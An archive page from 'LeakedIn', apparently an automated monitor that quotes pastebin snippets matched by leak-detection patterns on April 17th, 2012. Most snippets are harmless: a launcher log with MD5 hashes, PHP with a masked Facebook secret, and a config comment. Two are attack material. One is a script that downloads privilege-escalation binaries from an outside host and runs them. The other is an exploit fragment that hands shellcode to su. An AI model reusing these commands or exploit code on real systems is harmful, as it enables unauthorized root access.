LeakedIn Logo
Stories About Data Leaks and Related Stuff

Archive for April 17th, 2012

Potential leak of data: MD5/SHA1 Hash

0 votedvote

Detected 24 occurrence(s) of ‘[ \t:=”‘]+[0-9a-f]{32}(?:[0-9a-f]{8})?’:

k.yml'.
[17:29:46] [SEVERE]	[Info] Downloading 'minecraft.yml' from 'http://mirror.technicpack.net/Technic/minecraft.yml'.
[17:29:48] [SEVERE]	[MD5 Mismatch] File '\launcher\technicssp\modpack.yml' has md5 of 'f00f397dc8d35bf9f745321149a64245' instead of 'a4201ad8ff8d6765a80b0b68a9e1eb3e'
[17:29:48] [SEVERE]	[Info] Downloading 'modpack.yml' from 'http://mirror.technicpack.net/Technic/technicssp/modpack.yml'.
[17:30:11] [SEVERE]	Starting download of 'http://s3.amazonaws.com/MinecraftDownload/windows_natives.jar.lzma', with 3 trie(s) rema

Source: pastebin.com/raw.php?i=Xh4T8reT

Potential leak of data: Exploit

0 votedvote

Detected 3 occurrence(s) of ‘exploit’:

sd");
system("./bsd");
system("id");
system("wget http://atelier3.jp/js/js/bsd-ktimer");
system("chmod 777 bsd-ktimer");
system("./bsd-ktimer");
system("id");
system("wget http://atelier3.jp/js/js/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
system("wget http://atelier3.jp/js/js/freedbs5.3");
system("chmod 777 freedbs5.3");
system("./freedbs5.3");
system("id");
system("wget http://atelier3.jp/js/js/mountnfsex");
system("chmod 777 mountnfsex");
system("./mountnfsex");

Source: pastebin.com/raw.php?i=mPJkxWef

Potential leak of data: Secret Variable

0 votedvote

Detected 2 occurrence(s) of ‘secret\s*[\=]+’:

            error_log($e);
                $user = null;
            }
        }
        echo $user_profile[name];
        echo $user_profile[id];
        echo $user_profile[picture];
	
include ('src/facebook.php');    
$app_id = "160336957418730";
$app_secret = "************************";
$facebook = new Facebook( array('appId' => $app_id, 'secret' => $app_secret, ));
$user = $facebook->getUser();
if ($user) {
  try {
    // Proceed knowing you have a logged in user who's authenticated.
    $user_profile = $face

Source: pastebin.com/raw.php?i=h8n9tc2C

Potential leak of data: Shellcode

0 votedvote

Detected 6 occurrence(s) of ‘shellcode’:

			"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
			"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
		printf("[+] Executing su with shellcode.\n");
		execl("/bin/su", "su", shellcode, NULL);
	} else {
		char sock[32];
		sprintf(sock, "%d", sockets[0]);
		printf("[+] Executing child from child fork.\n");
		execl("/proc/self/exe", prog_name, "-c", sock, NULL);
	}
	return 0;
}

int main(int argc, char **argv)
{
	prog_name = a

Source: pastebin.com/raw.php?i=JZ3Dph9F

Potential leak of data: MD5/SHA1 Hash

0 votedvote

Detected 1 occurrence(s) of ‘[ \t:=”‘]+[0-9a-f]{32}(?:[0-9a-f]{8})?’:

e, the possible CA certificates in the server certificate chain
#	are ignored and only the server certificate is verified. This is
#	configured with the following format:
#	hash:://server/sha256/cert_hash_in_hex
#	For example: "hash://server/sha256/
#	5a1bc1296205e6fdbe3979728efe3920798885c1c4590b5f90f43222d239ca6a"
#
#	On Windows, trusted CA certificates can be loaded from the system
#	certificate store by setting this to cert_store://<name>, e.g.,
#	ca_cert="cert_store://CA" or ca_cert="cert_store://ROOT".
#	Note that when running wpa_

Source: pastebin.com/raw.php?i=PNHz7enW

You are currently browsing the LeakedIn blog archives for the day Tuesday, April 17th, 2012.